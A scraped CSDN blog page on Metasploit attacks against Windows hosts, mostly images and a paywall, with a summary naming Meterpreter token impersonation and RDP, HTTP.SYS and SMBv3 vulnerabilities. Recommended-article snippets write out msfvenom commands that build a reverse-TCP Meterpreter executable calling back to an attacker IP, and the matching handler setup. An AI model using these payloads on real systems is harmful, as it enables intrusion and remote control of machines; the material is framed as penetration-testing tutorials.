msf windows主机攻防

最新推荐文章于 2024-07-15 11:34:13 发布
最新推荐文章于 2024-07-15 11:34:13 发布
阅读量858 收藏 1
点赞数
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46476861/article/details/122650133
版权
本文探讨了Windows主机的攻防策略,包括使用Meterpreter命令进行incognito伪装和impersonate模仿,以及无密码情况下进行token操作。同时,文章提到了通过CVE-2019-0708和MS12-020进行远程3389渗透攻击的风险,并警告系统漏洞验证可能导致蓝屏。此外,还介绍了CVE-2015-1635 HTTP.SYS远程执行代码漏洞和CVE-2020-0796 SMBv3漏洞,这些漏洞可能导致系统蓝屏或蠕虫型攻击,允许攻击者进行提权并执行恶意操作。
摘要由CSDN通过智能技术生成

meterpreter命令
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
incognito 伪装
impersonate模仿
模拟任意用户(token操作),无密码就行
在这里插入图片描述

最低0.47元/天 解锁文章
范PEI西
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用msf进行有防火墙限制的3389端口转发
久恙502的博客
04-05 252
3389端口转发
msf windows
09-22
msf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windows
漏洞利用四:3389端口漏洞利用
热门推荐
ZY95001的博客
09-04 1万+
一、MS12-020 二、CVE-2019-0708
windows及centos安装MSF(Metasploit)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
07-15 817
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布MSF时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。
渗透测试神器之metasploit
weixin_52180702的博客
07-18 2424
metasploit 永恒之蓝漏洞复现
渗透小技巧从getshell到3389端口远程桌面连接靶机
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-16 1万+
渗透或平时比赛中还在为自己命令行操作不熟而感到烦恼吗?直接命令行方式启动远程桌面连接,让效率提高。
使用MSF渗透攻击win7主机并远程执行命令
weixin_43991459的博客
06-15 3157
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用的攻击载荷 若失败将靶机
71-71.渗透测试-Windows安装msf.mp4
05-10
71-71.渗透测试-Windows安装msf.mp4
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
"MSFconsole(msf渗透神器)windows平台可以使用,亲测可用" 指出该资源是Metasploit Framework(简称MSF)的一个版本,特别适用于Windows操作系统,并且已经被验证为可正常运行。MSFconsole是Metasploit Framework的...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
第二十八课:基于MSF发现内网存活主机第六季1
08-03
4. `auxiliary/scanner/rdp/rdp_scan`:扫描远程桌面协议(RDP),以确定Windows主机是否启用远程桌面。 5. `auxiliary/scanner/smtp/smtp_version`:扫描SMTP(简单邮件传输协议)服务的版本信息。 第五季的模块...
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
Innocence_0的博客
02-26 2055
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
强化远程终端3389入侵
|独自望海。。。
12-22 744
 很多朋友利用输入法漏洞通过3389端口入侵别人的服务器时,会发现在连接对方机器后,无法像内网计算机那样可以互传文件,这在很大程度上使入侵后的攻击大打折扣,其实打上微软自家的“补丁”就可以解决这个问题。   在此,笔者就要为大家介绍一下服务器端和客户端的配置方法,让大家能够通过3389终端服务,实现终端机器与本地机器的文件互传。   服务器端(被攻击方)   首先,在http:
windows及centos安装MSF(Metasploit)
siu~
08-22 2311
windows及centos安装MSF
[2023最新]Metasploit(MSF)下载安装及使用详解,永久免费使用,环境配置和使用技巧指南
kjuhfkicf154的博客
01-13 5706
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 6944
生成木马进行植入
msf windows简单渗透
西部壮仔的博客
08-19 1995
建立后门 一 建立反弹后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f exe >shell.exe 二 监听端口建立回话 1 使用handler模块 msf > use exploit/multi/handler 2 设置payload msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tc
msf windows
09-02
msf windows版是Metasploit Framework在Windows操作系统上的版本。你可以在默认安装目录C:\metasploit-framework\bin中找到安装文件。安装Metasploit Framework可以使用Windows木马生成工具msfvenom,生成一个Windows平台的木马程序,然后在攻击机上运行该木马程序。例如,使用以下命令生成一个反向TCP连接的Meterpreter木马程序,并保存到C:\tool\shell.exe文件中:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP地址LPORT=10000 -f exe > C:\tool\shell.exe<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值